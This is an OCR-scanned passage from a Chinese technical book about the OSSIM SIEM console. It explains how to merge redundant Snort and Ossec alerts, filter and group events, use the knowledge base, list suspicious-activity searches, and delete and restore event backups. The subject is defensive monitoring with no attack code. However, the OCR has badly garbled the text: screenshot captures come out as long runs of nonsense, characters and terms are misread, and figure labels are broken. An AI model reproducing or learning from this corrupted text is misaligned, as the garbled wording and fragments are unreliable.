SIEM 合并 元 余 的 报警 信息 主要 是 从 3 方面 来 考虑 : 


CD 合并 基于 主机 的 监控 Ossec 产生 的 元 余 报警 事件 。 
(2) 合并 基于 网 络 的 监控 Snot 产生 的 宛 余 报警 事件 。 
G) 合并 来 自 Directive 的 告警 。 


接着 ， 我 们 查看 SIME 的 数据 源 中 的 分 类 。 如 图 2-81 所 示 。 
SECURITY EVENTS (SIEM) 


Sigature E o 


SHOV EVENTS DATA SOURCES 
ci: 


图 2-81 根据 数据 源 筛 选 事件 


报警 日 志 的 过 滤 实 质 是 保留 或 者 抛弃 所 关心 的 日 志 , 将 原始 日 志 消息 解析 为 统一 格式 ， 以 
便 分 析 数 据 。 在 OSSIM 的 SIEM 控制 台中 能 显示 很 多 数据 ， 如 何 快速 过 滤 出 有 用 的 数据 至 关 
重要 。 

首先 ， 我 们 认识 SIEM 日 志 基本 格式 ， 它 由 Signature, Date, Sensor, Source, Destination, 
Asset 和 Risk 共 七 个 部 分 组 成 ， 各 部 分 含义 如 下 : 

Signature: 日 志 特征 。 

Date: 时 间 。 

Sensor: 传感器 ， 表 示 从 哪个 探测 器 获取 的 日 志 。 

Source: 源 地 址 ， 往 往 是 攻击 的 发 源 地 ， 实 际 上 这 个 地 址 很 可 能 伪造 。 

Destination: 目的 地 址 ， 通 常 在 攻击 期 间 这 个 地 址 保持 不 变 。 

Asset: 资产 。 

Risk: 风险 值 。 

但 是 , 我 们 可 以 在 * Custom Views 自 定义 显示 方式 中 获得 更 多 的 日 志 信息 ， 如 图 2-82 所 
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03181753451 windows2rto9 162273080 


图 2-82 HENX SIEM 列表 
在 SIEM 面板 中 有 很 多 过 滤 开关 ， 从 上 至 下 依次 介绍 如 下 : 


(1) 首先 是 Search， 它 可 以 输入 日 志 的 关键 字 ， 再 单 击 “Signature” 按 钮 ， 系 统 就 会 列 
出 与 之 匹配 的 日 志 ， 然 后 再 找 出 这 些 日 志 ， 但 其 中 肯定 还 有 不 少 干扰 日 志 。 接 着 进一步 过 滤 ， 
输入 IP 地 址 , 然后 单 击 “IP” 按 钮 , 它 会 列 出 “src or dst ip”, “sre ip”、“dst ip". “sre or dst host". 
“sre host” 和 “dst host" 6 种 筛选 方式 。 
经 过 多 重 筛选 后 ， 基 本 就 能 定位 到 想 要 的 日 志 。 如 图 2-83 所 示 。 我 们 还 可 以 通过 单 击 
“clear” 按 钮 来 逐条 删除 过 滤 条 件 。 


IP REPUTATION ACTIVITY ne { 
l PET 11 


DOVON R n 
U 


2-83” 列 出 当前 查询 条 件 


(2) 其 次 ， 可 根据 “Sensor+ 数 据 源 ”组 合 过 滤 模式 ， 我 们 可 以 输入 探测 器 IP 地 址 ， 然 
后 输入 数据 源 种 类 以 及 风险 等 级 的 低 、 中 、 高 来 更 精确 地 过 滤 日 志 , 在 提供 的 更 多 过 滤 选 项 中 
还 可 以 由 数据 源 组 、 网 络 /主机 组 以 及 日 志 种 类 等 特性 进行 过 滤 。 如 图 2-84 所 示 。 
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sensor Data sources nak » Taxonomy and Reputation Filters t 
latenvautt (182.168.120 1201 国 国 
> More Filters. > Taxonomy and Reputation Filters. Taxonomy e 
More Fiters | CE TE 
Extra Data: [riaa [= [e] "melire analysis: S Product Type: | x 
to an Event Category: |Denial Of Service - 
DsGroups: | m Sub-Category: |Flood = 
Network Groups: 国 
Emu IP Reputation 
! Host Groups: 国 
Home networks f By source | By destination SS GMA Activity: | E3 
jeune Login sestion openad 20115706 07 4000 S (————1 
zu uad Severity: [v] 
IT ossec: Logn session opened 201307.06 032326 
Search | Clear napine Current Search Criteria [. Clear Al Crena. ] 
pe F^ monte | Parosa MUN panaan 
Product Type ~ (Alarm) - Cie. aay 
Sensor Dots sources ax vent Category = (Denisi Of Service) ~ Cor. 
- m Bme >= 106/04 /20131 L any amal. -cear- 
More nmen ARRAT > Ciano ond Reputation FRE 
abit : » — 
Tine am selection GT pe a = nie Eventa p 
EE eae 1 tant aaye | tagpj Event Categor: [Dosor Sere 国 manne Source Port TCP | Upp Taxonomy 


Ein rei nes Demon DesmatonPerTCP|UDe Product Typos cargan 
— zd 
1000s. Dos 分 类 下 的 子 类 信息 
Other 
tt 1200 eum , 


[82-84 SIEM 过 滤 选 项 


另外 ，SIEM 提供 的 日 志 统计 功能 非常 实用 ， 它 可 以 按 不 同 的 地 址 、 不 同 的 日 志 《〈 例 如 根据 协 
议和 端口 来 分 类 )、 不 同 的 嗅 探 器 和 不 同 的 数据 源 对 收集 来 的 日 志 进行 分 类 统计 ， 如 图 2-85 所 示 。 


Summary statistics 


Unique Evente Sensore Unique Data Sources 
Unique addresses: Source Port: TCP | UDP Taxonomy Unique IP links [FQDN] 
Source | Destination Destination Port: TCP | UOP Product Types | Categories Unique Country Events 


图 2-85 分 类 统计 


在 SIEM 事件 列表 中 往往 显示 多 种 类 型 ， 如 果 想 要 过 滤 某 一 种 数据 源 日 志 , 则 使 用 过 滤 源 
的 方式 。 如 图 2-86 所 示 。 


EVENTS 
snow enn crar iO 

[7 SIGNATURE CDATEGMI-00A SENSOR SOURCE DESTINATION rri 
SF Cüsnort"ETPROTROJANUkel Bot User Joining IRC" 2014.1008073353 on — 192168 11.151:753 m 148 81.111.121:65520 EE 
J Clsnort"ETPROTROJANUkelyBotUser]oining|RC" — 2014-1004073352 — ossm4!! — 192168.11.151:1753 um 148.81.111,121.65520 Ex 
SF Host operating system change 2014-10-04 07:33:46. ossimd411 — 19216811216 19216811216 CES 
LIT Host operating system change. 2014004073342 — osim4M — 19216811111 192168 11.111 CT 
LT Ese ELATACKRESPONSERC-Nékcnangeon 20141004073322 — cei 192168 118783 1 14881.111.121:65520 EE 
j 厂 ossec: Ossec server started. 201410.04073153 ossim411 — 192168:11.105 0000 gm 
BF [nort -ET SCAN Behavioral Unusual Port 445 2014004073132 — casmd11 — 1921681122249 192168.11.111:445 gu 


traffic Potential Scan or Infection 


2-86 SIEM 事件 过 滤 


我 们 可 以 选择 数据 源 过 滤 ， 例 如 选择 Snort， 如 图 2-87 所 示 。 在 SIEM 日 志 分 析 中 ， 有 时 
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希望 能 实时 显示 OSSIM Server 端 处 理 的 事件 ,我们 可 以 选择 图 2-87 中 “REAL-TIME ”按钮 ， 
在 显示 界面 中 会 不 停 地 刷新 事件 ， 我 们 还 能 通过 “Show plugin filter” 功 能 过 滤 出 指定 插件 发 


送 来 的 事件 。 


SECURITY EVENTS (SIEM) 


SIEM REAL-TIME EXTERNAL DATABASES 


Signature ag o 


DATA SOURCES 


SHOW EVENTS 


TAXONOMY: PRODUCT TYPE 
Iz] 


IP REPUTATION ACTIVITY 


s 


Last Day 
Anomalies 
[Directive alert 
C Last Week 
C. Last Month 


C Dare Range 


TAXONOMY: EVENT CATECORY 


IP REPUTATION SEVERITY 


SEARCH CRITERIA 
Last Day x 


图 2-87 过 滤 出 Snort 事件 报警 


从 图 2-88 中 可 以 看 出 在 SIEM 控制 台中 ， 特 征 码 为 “snort:ET SCAN potential SSH Scan" 


的 事件 总 共 出 现 了 50406 次 ，OSSIM 系统 可 以 归纳 为 一 条 报警 ， 并 记录 到 数据 库 。 


GROUPED T 


rour events ovau 加 | 


SIGNATURE 

T- ONU snor: "ET SCAN Potential SSH Scan" 

[7 OE snort: "ETPRO TROJAN Likely Bot User Joining IRC 

T^ snore "ET ATTACK RESPONSE IRC - Nick change on non-std port" 


r D snort: "ET SCAN Behavioral Unusual Port 445 traffic. Potential Scan or 
Infection" 


T^ snort "ET SCAN Behavioral Unusual Port 139 trafic Potential Scan or 
Infection" 


"IOTAL£(*)a UNIQUESRC # UNIQUEDST. 2 


2-88 ”显示 Snort 过 滤 结 果 
对 日 志 进 行 归 一 化 处 理 后 的 消息 头 信息 为 如 图 2-89 所 示 : 


DATE 


2913-1002 053238 GVT-400 


TRIGGERED SIGNATURE 


ED erort “ET SCAN Potensial SSH Sca" 


NORMALIZED 
EVENT 
DATA SOURCE NAME 
ES 
souncEAooaess souncEromr 
12107151 ES 
2-89 
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LATEST EVENT 


50406 2920 1 2014-10-04 06:32:38 

134 2014-10-04 09:10:02 

93 1 1 2014-10-04 09:11:36. 

19 3 4 2014-10-04 08:50:44 

14 3 4 2014-10-04 08:50:44 

ALENVAULT SENSOR INTERFACE 

essimá11 [192 168.11.105] eno 
EVENT TYFE ID CATEGORY SUB-CATEGORY 
2001219 Recon Misc 
PRODUCT TYPE DATA SOURCE 10 
Inarusion Detection I 

DESTINATON ADDRESS DESTINATION PORT PROTOCOL 

19216811.105 2 Te 
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上 图 中 日 志 包 含 了 时 间 惟 (包括 时 区 )、 传 感 器 、 网 卡 、 特 征 码 、 事 件 类 型 、 数 据 源 、 源 
地 址 、 目 标 地 址 、 源 端口 、 目 标 端 口 以 及 协议 等 信息 。 根据 这 些 信息 在 成 二 上 万 条 重复 数据 中 
找到 规律 ， 根 据 特征 码 的 不 同 ， 将 重复 数据 “消除 ”， 这 就 是 归纳 合并 (事件 合并 标准 主要 是 
参考 事件 类 型 、 协 议 类 型 、 目 标 IP 地 址 )。 

另外 ,我 们 还 可 以 通过 SIEM 中 提供 的 时 间 线 CTimeLine) 功能 分 析 事 件 的 发 展 趋势 ， 通 
过 列 出 TOP N 的 方式 显示 出 趋势 ， 所 列举 的 趋势 能 够 反映 一 段 时 间 内 的 数据 变化 ,例如 Siem 
vs Logger events 显示 24 小 时 内 变化 趋势 、Ticket resolution time 显示 了 一 周 内 变化 趋势 .Tickets 
closed by month 显示 了 每 月 统计 趋势 、Security events trend:last day 最 近 一 天 安全 事件 变化 趋 
势 、Security events trend:last week 最 近 一 周 变化 趋势 ,更 多 变化 趋势 还 可 以 到 报表 子 系统 中 输 
出 ， 如 图 2-90 所 示 。 将 这 些 日 志 归 纳 出 安全 事件 Top5、 嗅 探 主机 Top10， 或 者 占用 带宽 最 多 
的 Top10， 常 见 事件 类 型 Toplo 等 ， 从 这 些 信 息 中 可 以 快速 挖掘 新 的 可 疑 信 息 。 这 对 于 分 析 网 
络 攻击 事件 至 关 重要 。 


OVERVIEW 9 


pecunve noes MSS monom — wuweueumes COMPLIANCE sox 


TOP 10 PROMISCUOUS HOSTS SECURITY EVENTS: TOP 5 ALARMS £ SECURITY EVENTS: TOP 5 EVENTS 


图 2-90 仪表 板 显示 的 网 络 报警 和 攻击 排名 的 柱状 图 


2.16.2 ”将 重要 日 志 加 入 到 知识 库 

OSSIM 系统 中 采用 了 共享 信息 的 接口 ， 称 之 为 知识 库 (KDB)， 知 识 库 是 具有 一 定 智能 的 
信息 安全 管理 软件 ， 在 开源 领域 目前 只 有 OSSIM 系统 具有 基于 知识 的 系统 。 在 此 之 前 进行 安 
全 评估 和 漏洞 分 析 时 ， 经 常会 碰 到 对 于 海量 信息 查找 缓慢 ， 查 找 效率 低下 等 问题 ， 如 今 在 
OSSIM 中 使 用 知识 库 提高 了 我 们 分 析 问 题 的 速度 。 知 识 库 往 往 通过 关联 分 析 引 擎 联动 ， 为 应 
急 响 应 提供 了 知识 保障 ， 流 程 图 如 图 2-91 所 示 。 
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simi pdt 


化 Normalize 


lp 


Firewalls NetworkIDS HostIDS Vulnerabilities d crit 
图 2-91 关联 分 析 联 动 示意 
应 用 之 一 是 可 以 将 漏洞 扫描 的 结果 作为 IDS 系统 的 数据 源 。 知 识 库 具体 体现 在 哪些 地 方 
呢 ? 我 们 打开 SIEM 控制 台 查 看 事件 信息 就 能 发 现 。 如 图 2-92 所 示 ， 下 面 这 是 2 条 SSHD iA 
证 成 功 的 事件 ， 我 们 单 击 任意 一 条 可 以 发 现 。 


EVENTS 

[^ SIGNATURE v DATE GMT-4:00 a OURCE DESTINATION 

[- ossec: SSHD authei 1:51 。 ossim411 192.168.11.105:55746 192.168.11.105 上 过 > 
[ HD authent 2014-10-0406:41:51 ^ ossim411 192.168.11.105:55771 192.168.11.105 2-52 


Event Context information is not available. 


CONTEXT 
A ALIENVAULT INCIDENT RESPONSE: AUTHENTICATION [TAXONOMY] 
This is tem n sub-componen! perating system] 
知识 库 
Document Summary 
KDB De 

Document AlienVault Incident Response: Authentication 
An 
2012-11-08 

原始 日 志 


RAW LOG 


图 2-92 ”知识 库 的 信息 提取 
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图 中 的 原始 日 志 是 日 志 规 范 化 过 程 的 一 部 分 , 原始 日 志 是 必须 保留 的 。 最 重要 的 是 可 以 从 
规范 化 日 志 中 提取 原始 日 志 作 为 司法 证 据 。 下 面 我 们 详细 看 看 它 提供 哪些 具体 信息 , 事件 的 下 
方 是 知识 库 信息 ， 这 些 信息 可 由 用 户 自己 添加 。 

首先 , 通过 选择 日 志 左 侧 的 方 框 选项 , 再 单 击 右键 就 能 加 入 到 相应 的 知识 库 中 , 如 图 2-93、 
图 2-94、 图 2-95 所 示 。 


Insert into existing DS Group 


Skip: (7009 5501) is already into selected DS Group 


Skip: (7009 5501) is already into selected DS Group. 


Action DS Group Name Description 
Add Event Types. Tor network Access from or to Tor network ext nodes. 
Add Event Types Document fies Mcrosoft Office or PDF documents detected in network transit 


DASHEOARDS ANAUSIS ENVIROVMENT serons 


THREAT INTELLIGENCE € 


图 2-94 向 OSSIM 知识 库 中 新 增 条 目 


JE Pra one erson sen WR Lanciare oranmons neis 


sinss iE 48 XC Y 


ITF &SRCIP I8 Di GEDMCRES] 


eec a anguage mement o me Hr 79 see se meenn Cer on 
"d rere nC I Gag o mae Oo Ded DESC 


somoro 


EZ 
2-95 ”新 增 知识 库 示例 
在 新 增 到 知识 库 中 的 条 目 中 还 能 上 传 图 片 (系统 故障 截图 )， 统 一 保存 在 
/usr/share/ossim/uploads/ 目 录 下 ， 文 件 名 以 新 加 文档 的 ID 号 命名 。 
通过 收集 这 些 日 志 信 息 ， 并 存放 到 OSSIM 的 知识 库 中 ， 经 过 长 期 积累 记录 就 能 够 为 企业 
积累 一 笔 宝贵 的 财富 ， 为 今后 网 络 故 障 诊断 和 取证 留 下 重要 的 判定 依据 。 
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2.16.3 SIEM 中 显示 不 同类 别 日 志 

在 OSSIM 系统 SIEM 事件 收集 中 ， 常 会 收 到 重复 日 志 ， 例 如 ， 攻 击 者 对 网 络 上 的 某 主机 
进行 端口 扫描 ， 在 每 次 探测 中 ， 系 统 会 创建 单独 的 事件 ， 每 扫描 一 次 IDS 很 可 能 创建 单独 的 
日 志 ， 而 这 些 大 量 重复 事件 的 源 IP 和 源 端口 在 每 个 事件 中 不 同 ， 而 目标 IP 地 址 〈 被 攻击 的 服 
务 器 ) 在 每 个 事件 中 基本 相同 , 但 这 些 重 复 的 数据 对 安全 人 员 意 义 不 大 , 管理 员 需 要 看 到 具有 
不 同 特征 的 事件 序列 。 更 重要 的 是 某 个 事件 重复 了 多 少 次 ,频率 是 多 少 。 在 OSSIM 的 Web UI 
中 用 图 形 化 方式 直观 显示 的 攻击 目标 端口 CTCP、UDP)， 路 径 为 Dashboards 一 Overview 一 
Security， 如 图 2-96 所 示 。 


on Ih 12h Ih 15h 16h 17h 16h 19h 20h 21h 22n 23h oh 
DISTINATIO! ol DESTINATION UDP PORTS 


图 2-96 图 形 化 显示 目标 端口 
OSSIM 系统 中 会 根据 日 志 的 特征 码 进行 自动 分 类 , 还 可 以 统计 源 地 址 和 目标 地 址 的 数量 ， 
值得 注意 的 是 ， 源 IP 地 址 不 足以 确保 唯一 性 ， 很 可 能 是 伪造 的 ， 而 目标 地 址 通常 在 攻击 期 间 
保持 不 变 , 这 有 助 于 安全 人 员 结 合 特征 码 来 分 析 故 障 。 如 图 2-97 所 示 , 这 个 截图 列举 了 OSSIM 
4.6 系统 中 的 SIEM 消除 重复 事件 的 显示 结果 。 默 认 按 特征 码 分 组 ， 如 图 2-98 所 示 。 


EVENTS GROUPED g VELINE 


不 同 种 类 事件 
;ROUPEVENTS Bv [signature — [v] 
HSP IT 4 N AL N 
事件 数量 
SIGNATURE EVENISEU]4 UNIQUESRCE UNQUEDST.# LATEST EVENT GRAPH 
nrc on 2909 1 1 2015-11-2005H 
C] Aeris HDS: Logn sesion 3900 1 1 20511.2005H 
AlerWaut HIDS: SSHD 
口 证 "see 2895 1 1 2015-11-20 05H 


2-97 通过 Grouped 显示 不 同类 型 事件 
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EVENT GROUPED 


croup evens mane — Tel 


SIGNATURE vomema uaquEsacs UNOUEDST # LATESTEVENT [^ ^ 
D] std Received disconnect zum 1 1 2040515013826 


2027 1 1 201409.19013&:27 TUTTA inii l 
图 2-98 根据 特征 码 来 分 组 
在 SIEM 控制 台中 具有 强大 的 筛选 功能 ， 可 以 按 不 同事 件 〈Unique Events)、 不 同 的 地 址 
〈 源 地 址 和 目标 地 址 ) 以 及 不 同 的 国家 显示 ， 如 图 2-99 所 示 。 注 意 在 选择 Grouped 时 ， 系 统 
会 对 alienvault_siem 库 中 acid. event 表 进 行 SELECT 操作 ， 当 某 类 事件 数量 达到 千 万 级 时 ， 等 
待 时 间 较 长 。 


+ MORE FILTERS 国 ADVANCED SEARCH 


Select One 
iP 


IDM Hostname 


IDM Username z Select one 
[Select one — Janv 


Source TP GROUP 
[Destination | 


图 2-99 SIEM hA ERE 
下 面 我 们 举 一 个 应 用 例子 :根据 源 IP 进行 定位 显示 。 如 图 2-100 所 示 。 


P ETT ene 


图 2-100 根据 源 IP 定位 显示 
我 们 选取 第 一 个 搜索 的 源 IP: 10.232.63.76， 会 显示 如 图 2-101 所 示 的 相似 内 容 。 
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EVENTS 


RQUPE[ IMELINE 


Sen with 


i23 REDEEM ^ Source | Destination | Source/Destination 


show Unique Events 调 取 0SSIM 中 Ntop 模 块 检测 流量 信息 


Registry IOOKUP — RIPE | ARIN WHOIS-RWS | LACNIC 


Fyrene ynos | Detel org uo | Trustedsource azg rro J Proje Honey Pot Jspamnaus org Pinto | spamcopnet P ro | Senderbas org Info 
External: Be orco subnet Report | WOT Sech euR. I Googie o Jon Exe duds | dd 
10. 232. 
FQDN: (ne +d) 
Numar caurances Oceurances Last 
Sensors prs 3s Dest Occirrence Occirence 


1 128020 150218 2015-03-13 00:00:37 2015-03-19 03:44:03 


图 2-101 显示 某 IP 详细 属性 


这 里 显示 了 非常 详细 的 信息 , 这 些 信息 当中 主要 是 针对 检测 公 网 地 址 才 起 作用 。 在 这 张 图 中 ， 
我 们 以 顺藤摸瓜 的 方式 在 “External” 栏 中 可 找到 很 多 有 关 IP 的 背景 资料 ， 这 些 资料 是 来 自 于 不 
同 组 织 对 这 个 IP 检测 的 测评 结果 ， 对 我 们 判断 一 个 陌生 IP 的 信誉 度 ， 有 着 非常 重要 的 作用 。 


2.16.4 ”常见 搜索 信息 
下 面 介绍 一 些 网 络 安全 人 员 应 该 关注 的 搜索 类 型 ; 


SSH 服务 N 次 登录 之 后 ， 仅 一 次 登录 成 功 ， 这 很 有 可 能 是 尝试 某 种 暴力 破解 ， 此 时 

我 们 可 以 通过 OSSIM 策略 进行 报警 ， 这 里 N 的 范围 一 般 为 4~6。 

VPN 用 户 如 果 在 非 工作 时 间 登 录 ( 尤其 是 夜晚 或 凌晨 ) ， 这 表示 可 能 受到 攻击 ， 管 

理 员 必 须 警 觉 。 

网 段 内 某 台 主机 开始 探测 其 他 主机 ， 这 台 主 机 有 可 能 受到 蠕虫 或 感染 恶意 软件 ， 也 有 可 
受到 网 络 攻 击 ， 这 时 需要 在 OSSIM 的 SIEM 中 搜索 防火 墙 日 志 ， 进 一 步 分 析 

在 极 短 时 间 内 ，N 次 尝试 访问 共享 文件 夹 (或 者 文件 ) ， 这 很 可 能 用 户 账 户 泄 露 ， 攻 

击 者 正在 入 侵 ， 往 往 这 个 时 间 是 非 工作 时 间 。 

交换 机 配置 在 非 工作 时 间 被 修改 ， 意 味 着 很 有 可 能 被 攻击 。 

Web 服务 器 短 时 间 出 现 很 多 Web 404. 401. 500 错误 代码 ， 表 明 服 务 器 工作 

异常 。 


2.16.5 [XX EUR 


在 OSSIM 4 系统 中 ， 主 界面 增添 了 自 定义 面板 功能 选项 ， 单 击 铅笔 状 按钮 人 二， 用 户 
可 以 自己 添加 Honeypot Activity, Network 等 功能 。 如 图 2-102 所 示 。 
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DASHBOARDS ANALYSIS ENVIRONMENT REPORTS CONFIGURATION 
OVERVIEW o 
+ (BEIM € necs + Ye M 
= [o3 
B neue nevaea inthe cea E 
e died in the cefat ien ri 
LATEST SIEM VS LOGGER EVENTS a SIEM:TOP 10 EVENTS BY PRODUCT TYPE — 6 THREAT LEVEL "EA 
anea T 495 
| 5 E 
| 0 
| 
| 
39% 
UNRESOLVED ALARMS VS OPENED TICKETS — d d ec SIEM: EVENTS BYSENSOR/DATA SOURCE — à 


图 2-102 ”调整 仪表 盘 显示 内 容 


另外 ， 用 户 还 可 以 单 击 SIEM 控制 台中 右 侧 的 书本 状 图 标 = -一 5 后 ， 自 定义 SIEM 
显示 内 容 ， 如 图 2-103 所 示 。 


L 国 X 


DASHBOARDS ENVIRONMENT REPORTS CONFIGURATION 
口 senwrune -paEauramg。  smsor source vesnnanon — eem 
PERSE AWSOOSIMES lorah 20210516038 EIS Er 
C] emec oben opened. 201501052HE7 tex 国 202105155 罗 mane perautr eP 

T E TAXONOMY tA 

J [J ossec sarpaumeracaon succes anseris anos 15216811 1084067S mran B 

下 T 7 aspuranoN v 6 
Jump —— 202 10 19038 saz sean 10n 
oran A 
So reced deinent cn ——— à 
msc ANALYSE 
D] SSha: Lop ness, Acceptea puotciey amsoosziieas wamom 152168111054067 ‘921681110822 
Et ken  |ETO 10s Ss re 
日 二 SR amsorosziieas camo 1921681110340074 miano Ee 

LL) ossec: Login session dose. 20isoltszrig  wanoz — M2 TOS S538 19236811108 BEST rum] 

à E] Sit Recind deconnct nsonasari8 — ame 19216411108 vienne za A 
i amsoroszwieas dessen o 国 2aziosieaaa € 

5 [ essc ssnb aumerucanon success, anecne see ano 1s21681110540673 irano ESL = 


2-108. EE X. SIEM 


自 定义 之 后 ， 增 加 了 Payload (有 效 负载 )， 显 示 效果 如 图 2-104 所 示 。 
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NS B X ZEN 
ENVIRONMENT REPORTS. CONFIGURATION. 
— 


"TT 
EET vorn 


DASHBOARDS 


T 
OSSIM REPORTS REPUTATION g 
DETAIL T 
Bids RISK ANALYSIS. g 8 
snow raeno cup Mil Ott LI T 
$ MYSIEM iu uU 
L]  DATASOURCEID CATEGORY SIGNATURE  USERDATAZ PAYLOAD 
[is Logn AV- Alen - "14057320507 --> RID: "3501" RL: "T: RG; "pars, yog authentication sucess" RC: "Logn sesscn opened." USER: "one" 
DO Wo authentinion Logn EY Sa OP. "Mone" FOSTNAME. "ient: LOCATOR rae cg EVENT TNU VE S107 4Daleauh a(SCUT ^ 192168121E 
son spes pam uniztsu:session} sess on opened for use abotimq Dy (ud q[END[ 
quac Aag AV- Her ACS7IROSI -> ID: SEQ AL: =T: RG: S og authen ca n arces RC Logn zessen opened ^ UR Monet 
pO T7009 Authentication Logn sesion Rap: Hone”. HOSTNAME: "al evaulis LOCANON "var tog/athiog EVENT. TLUI MES 1.0738 alenvaulr UASA} 192181121 
son opened. pan. unidsusession) session opened {or user api by (ule=O{END)’ 
penec. 
" ir logon AV- Alen - "1405731851"--> RID: "5501" RL: "Y" RG: ya sysogauthenticatio n success" RC wn sesson opened, USER: "None": 
TL TI E Sir "one HOLE leva CORN outh eg EET Da Eee A aaa 
May opened am unixtsu:session: sessen opened for user abo tma by (uld=OfEND 
gc lon AV- Alert» "HCESERCT - RID: 501" 8L RG: Tpann sogauthentian a" RC "Logn sessen opened." USER: None" 
o 709 — Auhenicajor Logn seston SROP: None” HOSTNAVE "alervauir* LOCATOR: "anda log" EVENT hin) 6 185331 alienat N93]. 19216811218 
ason spes un unaisshesessiony sessen openec for user wap by (a d=OKENDI® 


2-104 ÉN SIEM 效果 


2.16.6 ”事件 删除 与 恢复 
为 了 在 SIEM 控制 台中 删除 不 必要 的 干扰 事件 ， 读 者 需要 掌握 3 个 重要 按钮 的 功能 。 
€ Delete selected: 删除 匀 选 项 事件 ， 为 了 快速 义 选 所 有 事件 ， 可 将 Signature 前 面 的 复 
选 框 选中 。 
© Deleteall on screen: 该 选项 可 快速 删除 当前 屏幕 显示 的 事件 。 
@ Delete entire query: 这 个 很 危险 ， 能 够 删除 全 部 查询 。 


在 系统 负荷 较 大 或 事件 数量 大 时 ， 删 除 过 程 会 变 得 缓慢 ， 数 据 执行 大 量 INSERT.DELETE 
使 CPU 占用 率 很 高 , 在 Search criteria (搜索 条 件 ) 方 框 下 方 会 出 现 “Deleting in backgroud 
(后 台 删 除 中 ) ”字样 ， 大 家 不 要 重复 单 击 删除 按钮 。 


OSSIM 系统 每 天 会 自动 备份 SIEM 事件 ， 存 储 路 径 为 /var/lib/ossim/backup/， 文 件 
名 为 environment_database_backup_ 日 期 _tar.gz， 其 中 “日 期 ”采用 年 、 月 、 日 表示 。 
当 找 到 备份 文件 后 ,不必 在 命令 行 手动 导入 ， 只 要 在 Web UI 中 轻 点 鼠标 就 能 完成 。 下 
面 我 们 尝试 恢复 SIEM， 首 先 在 Configuration 一 Administration 一 Backup 菜单 中 选择 


Dates to restore 中 的 某 个 日 期 ， 比 如 05-04-2015， 然 后 单 击 RESTORE 按钮 ， 随 后 系统 
开始 恢复 。 如 图 2-105 所 示 。 
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ADMINISTRATION. 


users main BACKUP 
BACKUP MANAGER BACKUP SYSTEM LOGS 
onres TO wesrome DATES IN DATABASE. Dare EL rm 
85-64-3019 | 99942015 ] 2015-04-07 03.0023 "o 
Oa-04-2015 
2015-04-07 03:00-05 o 
2015-04-05 03:00:14 "o 
2015-04-05 03:00:04 "o 
CCAir üsers - Di 
Ca Entities - E Backup Progress 


The backup process is inserting events. 


LATEST BACKUP EVENTS 
vere pure acmon 
admin 2015-04-07 06:41.42 Insert events from 2015-04-09 


85,195 events stored in database 


图 2-105 备份 进度 


d 如 果 使 用 OSSIM 4.3， 那 么 在 这 个 备份 目录 下 的 文件 为 ossim-backup 年 + 月 + 日 .sql.gz 


2.16.7 ”深入 使 用 SIEM 控制 台 

用 于 分 析 和 处 理 Snort 收集 的 入 侵 数据 并 以 图 形 化 方式 展示 出 来 的 主要 工具 就 是 SIEM 控 
制 台 , SIEM 控制 台 以 一 种 比 Snort 输出 的 原始 数据 更 加 容易 理解 的 方式 给 出 报警 和 入 侵 数 据 ， 
如 图 2-106 所 示 。 


ID# —— Date OMT-4:00. Triggered Signature. Data Source Name Data Source ID — Event Type ID. 
28-366 2014091040120 snort "ET MALWARE All Numerical cn Domain Likely Malware Related" anon 1001 2012327 
Source Address Source Port — Destination Address Destination Port — Protocol _ Asset S+ D — Priority — Reliability Risk 
Meta 103214131 Q 40285 225595 E vop EET] = 2 Ces 
Sensor Address Interface. 
Sensor 一 一 一 


103214133 emo 


Context Analysis © No action related to the context analysis 


Source Address Dest. Address Ver Hdr Len TOS jengin iD fragment offset TTL chksum 


18545 


Pp 103214131 asss 4 9 9 € 09 攻 呈 arre EI 


Options none 


EEEE —sÀ vmm: 
uoe 
cac 本 
enel torti rte teans] Rot] [tt 

a 

Nomai F 

Display 260 
— 

a 

payioaa 

Soon nue Detection 

ownieaa d 


inpcap — Filezemerging-malwere. rules 
format 。 Rule: alert udp SHOME, NET any -> SEXTERNAL NET ss 


2-106 发现 可 疑 的 数据 包 
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数据 按 事 先 设计 好 的 逻辑 方式 排列 , 这 样 有 助 于 安全 员 快 速决 策 。 数据 包 以 易于 理解 的 方 
式 展示 出 来 ， 这 样 可 以 很 清楚 地 记录 了 包 中 承载 的 信息 。 

除 此 之 外 ,还 能 够 清晰 展示 数据 包头 信息 ,如 图 2-107 所 示 。 这 相当 于 同时 运行 了 Wireshark 
抓 包工 具 。 


cap File: 


* 6 GENINFO 
= s FRAME 
= (8| Arrival Time: Jun 41, 2014 08:09:00.000000000 
* iE Time delta from previous captured frame: 0.000000000 seconds. 
© i Time delta from previous displayed frame: 0000000000 seconds. 
* i Time since reference or first frame: 0.000000000 seconds. 
* 8 Frame Number: 1 
* i packet Length: 74 bytes. 
* (8 Frame Length: 74 bytes. 
市 ül Capture Length: 74 bytes 
* (8 Frame is marked: False 
*' 前 Protocols in frame: eth:ip:udp 
IP 
7 Y^ upP 
* iB Source port: 51148 (51145) 
* i Destination port: domain (53) 
由 /É source or Destination Port: 51148. 
= B [Source or Destination Port: 53 
3| name: udp.port. 
3 nde yes 
D sce 2 


3 pos 36 
8 show. 53 
E value. 0035 
* | Length: 0 (bogus, must be >= 8) 


图 2-107 包头 信息 


由 于 性 能 的 原因 ， 不 可 能 将 含有 过 多 特征 的 文件 信息 存储 在 数据 库 里 ， 在 OSSIM 控制 台 
中 每 次 显示 报警 时 ， 把 特征 相对 应 的 外 部 链接 也 显示 出 来 。 如 果 希 望 详细 了 解 某 个 报警 ， 则 可 
以 到 专门 的 URL 链接 上 查询 。 我 们 看 个 例子 ， 如 图 2-108 所 示 : 


140 014-06 150 
647 2 1 2014-06-11 11:14:13 

ando E 1 2 2014-06-11 09:29:50 

s7 1 1 2014-06-11 11:01:06 

CEN ZEN LEE a LZ Snort "ET P2P eMule Kademlia Hello Request s3 ' 1 2014-06-11 06:39:30 
Apache: Not Modified 3s 1 1 2014-06-13 07:32:01 


ED a EB LZ snot: "ET SCAN Behavioral Unusual Port 135 traffic. Potential Scan 
Sr infection 


2-108 Snort 报警 显示 URL 


在 第 一 行 显示 的 Snort “ET SCAN Behavioral Unusual Port 445 traffic, Potential Scan ”出 现 
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频率 很 高 ， 达 到 1020 次 ， 在 它 前 方 有 四 个 URL 连接 。 
第 一 个 图 标 链接 到 : http://doc.emergingthreats.net/2001569。 显 示 内 容 如 图 2-109 所 示 。 


12] EMERGING 
L3 THREATS 


Main Emerg 


3> Main Web > 2001589 " Jeon Attach. 
Log in or Register 
